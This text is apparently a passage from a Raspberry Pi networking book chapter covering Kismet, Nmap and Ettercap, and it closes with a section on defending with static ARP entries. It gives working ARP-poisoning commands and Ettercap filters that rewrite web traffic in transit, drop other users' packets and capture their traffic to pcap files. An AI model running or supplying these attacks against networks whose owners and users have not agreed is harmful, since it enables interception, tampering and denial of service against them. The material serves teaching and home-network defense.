When analyzing Wi-Fi networks in particular, we have to take the borderless nature of radio signals into account. For example, someone could be parked in a car outside your house running a rouge access point and tricking the computers inside your home to send all their traffic through this nefarious surveillance equipment. To be able to detect such attacks, you need a way of monitoring the airspace around your house.

Now that we have a better idea of the computer behind each IP address, we can begin to target the network traffic itself as it flows through our network.

For these experiments we'll be using an application called Ettercap. The act of listening in on network traffic is commonly known as sniffing and there are several great sniffer applications to choose from. What sets Ettercap apart is its ability to combine man-in-the-middle attacks with networking sniffing and a bunch of other useful features, making it an excellent tool for network mischief.

You see, one obstacle that sniffers have to overcome is how to obtain network packets that aren't meant for your network interface. This is where Ettercap's man-in-the-middle attack comes into play. We will launch an ARP poisoning attack that will trick any computer on the network into sending all its network packets through the Pi. Our Pi will essentially become the man in the middle, secretly spying...

Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes by, we also have the option of modifying the packets before we pass them on to its rightful owner. To manipulate packet contents with Ettercap, we will first need to build some filter code in nano:

pi@raspberrypi ~ $ nano myfilter.ecf

The following is our filter code:

if (ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Mischief");
  }
}

if (ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "<img")) {
    replace("src=", "src=\"http://www.gnu.org/graphics/babies/BabyGnuTux-Small.png\" ");
    replace("SRC=", "src=\"http://www.gnu.org/graphics/babies/BabyGnuTux-Small.png\" ");
    msg("Mischief Managed!\n");
  }
}

The first block looks for any TCP packets with a destination of port 80. That is, packets that a web browser sends to a web server to request pages. The...

There are times in every network owner's life when we just need that little extra bandwidth to watch the latest cat videos on YouTube in glorious HD resolution, right?

With the following Ettercap filter, our Pi will essentially become a very restrictive firewall and drop every single packet that comes our way, thus forcing the guests on our network to take a timeout:

pi@raspberrypi ~ $ nano dropfilter.ecf

Here is our minimalistic drop filter:

if (ip.proto == TCP || ip.proto == UDP) {
  drop();
  msg("Dropped a packet!\n");
}

The next step is to compile our Ettercap filter code into a binary file that can be interpreted by Ettercap, using the following command:

pi@raspberrypi ~ $ etterfilter dropfilter.ecf -o dropfilter.ef

Now all we have to do is fire up Ettercap and load the filter. You can either target one particularly pesky network guest or a range of IP addresses:

pi@raspberrypi ~ $ sudo ettercap -q -T -i wlan0 -M arp -F dropfilter.ef:1 /[target]...

By now you might be wondering if there's a way to protect your network against the ARP poisoning attacks we've seen in this chapter.

The most common and straightforward defense is to define static ARP entries for important addresses on the network. You could do this on the router, if it has support for static ARP entries, and/or directly on each machine connected to the network.

Defining static ARP entries on a router running Tomato firmware

Most operating systems will display the ARP table with the arp -a command.

To turn a dynamic ARP entry for the router into a static entry on Windows, open a command prompt as Administrator and type in the following command, but replace [Router IP] and [Router MAC] with the IP and MAC address of your router:

C:\> netsh -c "interface ipv4" add neighbors "Wireless Network Connection" "[Router IP]" "[Router MAC]"

The Wireless Network Connection argument might need to be adjusted to match the name of your interface...

Most sniffers have the capability to produce some kind of logfile, or raw packet dump, containing all the network traffic that it picks up. Unless you're Neo from The Matrix, you're not expected to stare at the monitor and decipher the network packets live as they scroll by. Instead, you'll want to open up your logfile in a good traffic analyzer and start filtering the information so that you can follow the network conversation you're interested in.

Wireshark is an excellent packet analyzer that can open up and dissect packet logs in a standard format called pcap. Kismet already logs to pcap format by default and Ettercap can be told to do so with the -w argument, as in the following command:

pi@raspberrypi ~ $ sudo ettercap -q -T -i wlan0 -M arp:remote -d -w mycapture.pcap /[Router IP]/ /[PC IP]/

The only difference running Ettercap with pcap logging is that it logs every single packet it can see whether it matches the target specification or not, which...

We started this chapter by focusing on the general airspace surrounding the Wi-Fi network in our home. Using the Kismet application, we learned how to obtain information about the access point itself and any associated Wi-Fi adapters, as well as how to protect our network from sneaky rouge access points.

Shifting the focus to the insides of our network, we used the Nmap software to quickly map out all the running computers on our network and we also looked at the more advanced features of Nmap that can be used to produce a detailed HTML report about each connected machine.

We then moved on to the fascinating topics of network sniffing, ARP poisoning, and man-in-the-middle attacks with the frightfully effective Ettercap application. We saw how to use Ettercap to spy on network traffic and web browsers, how to manipulate HTML code in transit to display unexpected images, and how to drop packets to keep your network guests from hogging up all the juicy bandwidth.

Thankfully, there are...